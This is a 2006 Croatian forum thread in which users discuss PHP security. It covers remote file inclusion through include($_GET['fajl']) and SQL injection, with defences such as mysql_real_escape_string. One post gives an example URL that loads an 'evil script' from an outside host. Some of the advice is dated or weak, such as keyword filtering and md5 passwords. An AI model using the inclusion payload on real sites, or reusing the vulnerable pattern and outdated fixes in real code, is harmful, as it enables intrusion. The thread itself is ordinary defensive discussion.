| |||||||
| Registracija | FAQ | Lista korisnika | Kalendar | Pretraži | Današnje Poruke | Označi forume pročitanima | Online igre |
| Računala Raspravljate o temi Hakeri u Tehnologija i Tehnika forumu; silence a ovo nekastranica.com/index.php?fajl=nesto jel tu ima kakvih gresaka u takvom nacinu?... |
![]() |
| | Opcije Teme |
| | #11 (permalink) |
| V.I.P. Član | silence a ovo nekastranica.com/index.php?fajl=nesto jel tu ima kakvih gresaka u takvom nacinu?
__________________ Tutorijali.Net - tutorijali na hrvatskom jeziku eBooks Network - arhiva IT e-knjiga za download Car news & Reviews |
| |
| | #13 (permalink) | |
| Banned | Citat:
e sad... ako piše recimo Kod: include ($_GET['fajl']); HTML Kod: nekastranica.com/index.php?fajl=http://www.moja_stranica.com/moja_zla_skripta.php međutim... već sa malo promjene se to može izbjeći... Kod: include ($_GET['fajl']."php"); ali to je već malo posla s moje strane... razradiš svoju skriptu još malo, recimo da prije includiranja provjerava sadržaj GET varijable i ako GET varijabla u sebi ima "http" ili "www" da se ne includira, onda si dodao još malo sigurnosti... naravno ni to nije kraj, ali ovo je onako na brzinu... ja se ne bavim tolko s time jer mi to nije napeto, ali imam frenda koji radi čuda i koji mi je objasnio neke stvari, pa sam dodao neke stvari u svoje skripte koje pišem... sve ovisi kolko truda ti se da uložiti u pisanje koda... recimo HTML Kod: www.mojsajt.com/index.php?i=1 PHP kod: ![]() sve ovisi kako posložiš web, ali i o tome kako je server podešen... ako je server admin loš i ostavio je rupe, onda ih ti moraš zatvarati i paziti puno više kaj pišeš nego ako postoji kvalitetan admin koji je server podesio kako spada... Zadnji Uredio silence : 19-01-06 u 15:55. | |
| |
| | #14 (permalink) |
| V.I.P. Član | Koliko je ovo sigurno? PHP kod:
__________________ Tutorijali.Net - tutorijali na hrvatskom jeziku eBooks Network - arhiva IT e-knjiga za download Car news & Reviews |
| |
| | #15 (permalink) | |
| Banned | http://en.wikibooks.org/wiki/Program...:SQL_Injection dobro pročitaj to, pa mi ti sam reci. za one ljene, u osnovi postoji mogućnost SQL injection napada jer izvršavaš SQL naredbu sa GET varijablom koju nigdje ne provjeravaš. da ti odma bude lakše, ja sam isto tako radio prije, ali nakon kaj mi je frend objasnio kako radi SQL injection i ostalo, malo sam pronjuškao po netu i počeo koristiti mysql_real_escape_string(). evo još malo. Citat:
evo jedan isto prilično dobar članak, koji nudi i neka rješenja... http://shiflett.org/articles/security-corner-apr2004 Zadnji Uredio silence : 19-01-06 u 18:54. | |
| |
| | #16 (permalink) |
| V.I.P. Član | Negdje sam pročito da ovo sprječava SQL injection: $pretraga=addslashes($_POST["pretraga"]); jel to istina?
__________________ Tutorijali.Net - tutorijali na hrvatskom jeziku eBooks Network - arhiva IT e-knjiga za download Car news & Reviews |
| |
| | #18 (permalink) | |
| Banned | Citat:
http://www.webmasterstop.com/63.html zajeb je u tome što konfiguracija servera nije uvijek ista. ako su magic quotes ON, onda dobiješ višestruke backslahove. vjerojatno je da će sprječiti SQL injection, ali imaš noćnu moru kaj se tiče korištenja skripte na različitim serverima ili čak ako server admin napravi upgrade i recimo magic quotes iz off budu on. dakle, nije da si u krivu, ali zbog vlastitog duševnog mira je bolje koristiti mysql_real_escape_string () funkciju koja je napravljena upravo za to. ako pročitaš članak koji sam linkao vidjet ćeš da addslashes() imaju problem kad vadiš podatke iz baze, jer te backslasheve treba maknuti... sve u svemu... prije pisanja skripte, uvijek je pametno malo se potruditi oko ovakvih stvari i proći po netu i vidjeti kaj ljudi kažu i kakva su njihova iskustva. | |
| |
| | #19 (permalink) |
| V.I.P. Član | A jebemu sad ću se zamislit prije nego što pustim stranicu u promet, a već sam sve sredio skoro...
__________________ Tutorijali.Net - tutorijali na hrvatskom jeziku eBooks Network - arhiva IT e-knjiga za download Car news & Reviews |
| |
| | #20 (permalink) |
| Banned | ma gle... ako si koristio addslashes() i ako ti sve radi kako spada, možeš pustit stranicu, ali samo istestiraj kako se ponaša kad unosiš podatke i kada ih vadi van... sve ovisi di si to koristio i za kaj. ovo je recimo kak ja rješavam pitanje SQL injectiona prilikom ulogiranja korisnika u admin dio stranice. PHP kod: ![]() može se naravno stavit i samo jedan md5(), ali ovo je čisto iživljavanje ![]() |
| |
![]() |
| Tagovi: hakeri |
| Broj korisnika koji trenutno prate ovu Temu: 1 (0 članova i 1 gosta) | |
| Opcije Teme | |
| |
Slične Diskusije | ||||
| Tema | Pokretač teme | Forum | Odgovora | Zadnja poruka |
| bosanski hakeri | pharaoh | Vicevi i Smiješni Tekstovi | 7 | 30-12-07 13:45 |
Trenutno vrijeme na forumu: 20:42.
















